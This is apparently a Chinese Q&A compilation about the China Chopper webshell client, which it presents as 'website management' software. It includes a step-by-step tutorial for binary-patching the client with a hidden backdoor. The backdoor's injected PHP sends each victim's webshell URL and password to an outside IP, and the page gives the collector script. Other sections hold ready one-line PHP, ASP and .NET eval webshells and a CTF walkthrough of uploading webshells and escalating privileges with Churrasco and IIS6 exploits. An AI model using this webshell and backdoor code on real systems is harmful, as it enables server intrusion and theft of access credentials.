菜刀腳本軟體

① 如何使用JSP一句話木馬和菜刀木馬

你好，
一句話木馬分為客戶端和服務端，服務端就是你要傳到網站上的，只有一句話代碼的那個腳本，傳上去後記住地址，然後本地打開客戶端，填上你的一句話木馬地址和密碼，連接就可以了，推薦用中國菜刀，官網地址www.maicai.com

希望回答對您有幫助.

② 中國菜刀是什麼軟體

中國菜刀是一款專業的網站管理軟體，用途廣泛，使用方便，小巧實用。

只要支持動態腳本的網站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等]，都可以用中國菜刀來進行管理！

常用功能：
文件管理，虛擬終端，資料庫管理。

其它功能：
WEB瀏覽器(POST瀏覽/自定義COOKIE瀏覽/自定義JS)
網站爬行(自動保存目錄結構)
網站安全掃描。

在非簡體中文環境下使用，自動切換到英文界面。

③ 如何給中國菜刀添加隱蔽後門

1、後門如何觸發
這里要先講下菜刀的後門是如何觸發的，知道如何觸發後門，後面按這個思路往下看會方便些。
當一句話連回目標伺服器時，我們經常會在文件列表中右鍵查看文件，如下圖

當我們執行右鍵-編輯文件時，我們的後門就會被觸發（我們要添加的就是這樣的一個隱藏後門）。
2、菜刀脫殼
在分析菜刀前，先把菜刀的殼脫掉，使用Peid可知，菜刀是UPx殼，網上找個Upx的脫殼工具即可脫殼。
3、查看數據包，分析流程（右鍵-編輯）
本地搭建好環境後，在菜刀中右鍵-編輯查看某一文件，使用burpsuite進行抓包，

數據如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=%w8LSIpO2RpZSgpOw%3D%3D&z1=%3D%3D

一共有3個參數，
a url解碼後為@eval (base64_decode($_POST[z0]));
z0先url解碼，在base64解碼為
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();

Z1先url解碼，在base64解碼為
C:\\wamp\\www\\robots.txt

稍微熟悉php的人應該能看出來，這段代碼就是一個讀文件的php腳本，由菜刀發送到目標伺服器上，然後在目標伺服器上執行的。 既然代碼作為字元串發送帶目標伺服器上，那我我們可以再字元串上添加我們想執行的代碼，由菜刀一起發送過去執行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我們將上這段代碼作為字元串，發送到服務端執行，我們就能獲得webshell的地址和密碼。
4、使用OD分析
使用OD打開中國菜刀，右鍵搜索字元串，結果如下：

定位到php讀取文的字元串處，點擊進去到代碼處

可知，程序時將其作為字元串，壓入棧中作為參數被後續函數處理的，如果在這段字元串後加入我們的後門代碼，就會被程序一塊發送到服務端執行。
5、修改菜刀程序文件
由上可知，字元串的地址為0x49ba94,查看內存數據，

發現其後面已經被他字元串佔用（直接查看原二進制文件結果也是如此），如果我們強制在後面添加後門字元串，就會破壞遠程的某些內容。因此我們需要另外找一個空閑的大空間，將後門代碼放在此處。
這里我們選取地址4841d0h的空間，轉化為文件偏移即為841d0h。
將後門字元串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0處
打開010editor 將上述字元串復制到010editor中，

由於程序中的字元串是雙位元組存放的，這里我們需要將後門代碼也轉化為雙位元組的。010ditor-工具-轉換

使用010editor打開菜刀程序，跳到841d0h偏移處，將轉換後的字元串覆蓋替換菜刀程序中相同大小的數據長度，

保存文件，這樣後門字元串就被我們添加到程序中了。
6、使用OD修改程序代碼
用OD打開菜刀程序，定位到第4步中字元串入棧的代碼處 push 0049bae4。
0049bae4地址是修改前字元串的位置，現在我們將其改成我們添加的字元串的地質處，字元串文件偏移為841d0h，轉化內存偏移為4841d0h,代碼修改如下

保存修改的文件即可。
7、測試修改結果
修改文件後，我們在看看菜刀-右鍵編輯，抓到數據包

Z0解密後為
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|<-");die();

可見我們的後門代碼也一起被發送到服務端執行了。
編寫加單的getx.php接收結果，
getx.php:
<?php
$getx = $_GET["cai"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?>

結果如下：

8、後記
通過測試可知，對於asp，aspx跟php後門的添加相似，都可以實現。Jsp木馬形式不一，實現添加後門較為困難。另外，由於後門是在服務端執行的，所以不容易被發現，本地抓包是檢測不到後門的；OD中右鍵查看後門地址也是不能直接看到的。

④ windows靶場提權總結

最近做了幾個i春秋的靶場，從getshell到提權，練習的還是很全面的，這里主要對提權做個總結。

先從提權反推一下思路： 提權 -> 上傳提權工具 -> 找上傳點 -> 連接菜刀getshell -> 寫入或上傳一句話 -> 找到寫入點或上傳點

一句話的寫入點或上傳點大多都是在管理後台發現的，因為用戶的許可權較低，可以操作的功能也較少，而且對於用戶的輸入或上傳也有很嚴格的過濾機制，所以使用用戶許可權來寫入或上傳一句話的成功率很低。
那麼就需要登錄管理後台來寫入或上傳一句話，登錄管理後台有兩個條件： ①找到管理後台 。 ②拿到管理員賬號和密碼 （爆破也可以，但是成功率很低，這里就不多做討論了）。登錄進管理員後台後，就可以測試哪個地方可以利用，可以上傳或寫入一句話了。然後就是上面的一系列操作，最後拿到flag。

拿我做的這幾個靶場為例，首先打開瀏覽器看到頁面，發現都是一些CMS，從頁面信息可以知道CMS版本等信息，然後信息搜集看看這個版本之前有沒有爆出過漏洞，如果有sql注入最好，可以嘗試通過注入拿到管理員賬號、密碼。當然也可以使用其他的方法，怎麼猥瑣怎麼來。
然後掃描目錄，如果管理員沒有修改CMS的默認目錄的話，管理後台還是很好掃出來的，如果修改過就比較困難了，就看你的字典強不強大了。當然也可以利用一些其他方法，比如信息泄露，如果是dedeCMS的話可以嘗試訪問 /data/mysqli_error_trace.inc 路徑或 /data/mysql_error_trace.inc 路徑，有可能會爆出後台路徑。
拿到賬號密碼和管理後台路徑後就可以登錄後台了，然後尋找哪個地方可以執行一句話，比如上傳圖片馬然後利用文件包含或解析漏洞執行一句話，或者試一下發表文章功能，試一下網站配置信息。反正姿勢越猥瑣越好。
拿到一句話的飢首路徑後可以連菜刀了，連上菜刀後由於許可權問題，C盤一般是沒有讀寫許可權的，而大多數flag都放在C盤，所以我們就要找一個有上傳文件許可權的目錄上傳提權工具進行提權，這里著重總結兩種提權方法。

利用 CVE-2009-0079 的漏洞，工具： Churrasco.exe + cmd.exe + 3389.bat ，其中 cmd.exe 是為了代替原伺服器中許可權受限的命令行交互環境，Churrasco.exe 是用於提權的漏洞利用工具，3389.bat 是打開 3389 埠及遠程桌面服務的批處理腳本文件。

提權命令：

同樣是利用 CVE-2009-0079 的漏洞，工具： pr.exe + cmd.exe + 3389.bat ，與churrasco類似，命令和churrasco提指神權命令一樣，不過第一次輸入命令會報錯，再輸入一遍就好了。

iis.exe 與前兩者不同，是基於 CVE-2009-1535 漏洞的提權工具，工具： iis6.exe + cmd.exe + 3389.bat ，用法與前兩種工具類似，第一次創建用戶時也可能會報錯，若創建失敗，再次執行即可。

現在提權已經完成了，打開CMD輸入 mstsc 啟動遠程桌面登錄，輸入目標ip和剛才創建的用戶的登錄賬號密碼就可以遠程訪問伺服器了，然後進入C盤拿唯肢虧到flag即可。

參考鏈接：
【i春秋】滲透測試入門 —— 我很簡單，請不要欺負我

⑤ 中國菜刀的功能介紹：

只要支持動態腳本的網站，都可以用中國菜刀來進行管理！主要功能有：文件管理，虛擬終端，資料庫管理。
UINCODE方式編譯，支持多國語言輸入顯示。
一、EVAL客戶端部分
1）要了解的
服務端只需要簡單的一行代碼，即可用此程序實現常用的管理功能。
支持的服務端腳本：PHP, ASP，NET。
在服務端運行的代碼如下：
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(pass)%>
.NET: <%@ Page Language=Jscript%><%eval(Request.Item[pass],unsafe);%>
(注意: .NET要單獨一個文件或此文件也是Jscript語言)
2）怎麼用
在主視圖中右鍵/添加，在彈出的對話框中輸入服務端地址，連接的密碼(請注意上例中的pass字串)，選擇正確的腳本類型和語言編碼，保存後即可使用文件管理，虛擬終端，資料庫管理三大塊功能。要是其它都沒錯誤，那麼可能就是你把語言編碼選錯了。
1. 文件管理：[特色]緩存下載目錄，並支持離線查看緩存目錄;
2.虛擬終端：[特色]人性化的設計，操作方便;(輸入HELP查看更多用法)
3.資料庫管理：[特色]圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式連接的資料庫。
(各種腳本條件下的資料庫連接方法請點擊資料庫管理界面左上角處的配置按鈕查看)
注意：由於伺服器的安全設置，某些功能可能不能正常使用。
3) 關於配置信息怎麼填？
A) 資料庫方面：
PHP腳本：
<T>類型</T> 類型可為MYSQL,MSSQL,ORACLE,INFOMIX中的一種
<H>主機地址<H> 主機地址可為機器名或IP地址，如localhost
<U>資料庫用戶</U> 連接資料庫的用戶名，如root
<P>資料庫密碼</P> 連接資料庫的密碼，如123455
ASP和.NET腳本：
<T>類型</T> 類型只能填ADO
<C>ADO配置信息</C>
ADO連接各種資料庫的方式不一樣。如MSSQL的配置信息為
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面：
添加額外附加提交的數據：應付這種情況：if ($_POST['action']=='test'){@eval($_POST['pass']);}
<O>action=test</O>
提交功能前先POST額外的數據包：會話期間只提交一次。
<DATA>uid=user1&pwd=123456</DATA>
二、網站蜘蛛
織出一張網站的目錄結構。
下載的列表文件存在桌面，右鍵菜單/載入URL列表即可以根據地址得到目錄結構。
三、定時提醒
當鬧鍾事使吧, 周期：每月/每周/每日/只一次。
四、快速啟動
一些常用的快捷方式放在這里，可以指定用戶身份運行程序。這部分數據是以加密存儲的。
五、瀏覽器
地址欄輸入HELP，更多精彩後續加入。
六、其它部分
等待加入。
附帶工具
update.exe是wsc.exe的資料庫wscdb遷移到菜刀的一個小工具。
把wscdb文件整到當前目錄，運行update.exe得到新的資料庫文件cai.mdb
把菜刀的資料庫db.mdb替換掉即可。